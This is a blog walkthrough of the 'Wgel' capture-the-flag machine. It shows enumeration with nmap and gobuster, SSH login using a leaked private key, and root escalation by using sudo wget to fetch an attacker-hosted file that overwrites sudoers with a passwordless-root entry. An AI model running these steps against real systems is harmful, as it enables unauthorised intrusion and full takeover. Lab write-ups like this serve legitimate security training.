Wgel CTF: Walkthrough

Aditya Jha
4 min readSep 9, 2023

This is a very easy machine, in which we have to get into the machine through SSH and then we have to escalate our privileges to get the root flag.

So Our Very First step is to run the Nmap scan.

Command: nmap -T5 -p- -A <target IP>

Now in the results we found 2 open ports,

SSH and HTTP.

I have filtered the nmap scan in this screenshot.

Now we will check for the port 80.

So there is a Apache web page.

If we check it’s source code then we can see something interesting.

Here is a name “Jessie”.

Now we will do Directory Busting with the help of gobuster.

Command: gobuster dir -u <target url> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Now we have found something interesting,

We found a website in this directory.

Now we will do directory Busting on this.

Command: gobuster dir -u <target url/sitemap> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Now we have found a directory named as .ssh

If we go to this directory then we can see that there is a rsa key.

We can use this key to login to the machine through ssh.

Earlier we have found the Name “Jessie”.

Let’s Login with this username and rsa key.

We have to give permission to the rsa key file to get executable.

Command: chmod 400 <file name>

Now we will login through ssh.

Command: ssh -i <rsa file> jessie@<target IP>

We have successfully logged in to the Machine.

We can get the user flag inside “Documents” Directory.

PRIVILEGE ESCALATION:

Now we will escalate our privileges to root so that we can get the root flag.

If we list the list the privileges for the invoking user

Command: sudo -l

then we can see we can use “wget” as a root without password.

We will use this to escalate us to root user.

We have to create a sudoers file and get that sudoers file into the target machine so that Jessie can run the commands as root.

create a file and store the following:

jessie ALL=(ALL) NOPASSWD:ALL

Now we will host this file with the help of python server.

Command: python -m http.server 80

Now we will wget in our target machine to get the new sudoers file into our target machine.

Command: sudo /usr/bin/wget http<your IP:80/sudoers> -O sudoers

Now if we use the

command: sudo ls /root

it will list the files of root file.

Now we can use the

Command: sudo cat /root/root_flag.txt

And we have finally got the ROOT FLAG…

--

--